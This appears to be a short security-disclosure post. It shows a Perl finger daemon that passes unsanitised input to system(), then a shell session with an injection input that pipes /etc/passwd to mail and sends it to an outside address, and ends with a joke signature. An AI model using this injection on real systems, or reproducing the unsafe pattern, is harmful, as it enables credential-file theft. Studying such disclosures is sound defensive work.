#!/usr/bin/perl
# fingerd - a simple finger daemon
$user = <STDIN>;
chop($user);
chop($user);
if(-e "/usr/lib/finger/$user"){
    system "/usr/bin/perl /usr/lib/finger/$user";
} else {
    system "/usr/bin/perl /usr/lib/finger/default $user";
}
[root@batleh perl-finger]# ./fingerd
|cat /etc/passwd|mail chris@viper.net
and many others....
-----------------------------------------------------------
CGI Joe - n.   A hard-core CGI script programmer with all the
               social skills and charisma of a plastic action
               figure. See "Chris Terry"
Chris Terry - n.  ITC^DeltaCom Web/CGI guy  chris@viper.net
        In a world without fences, who needs Gates??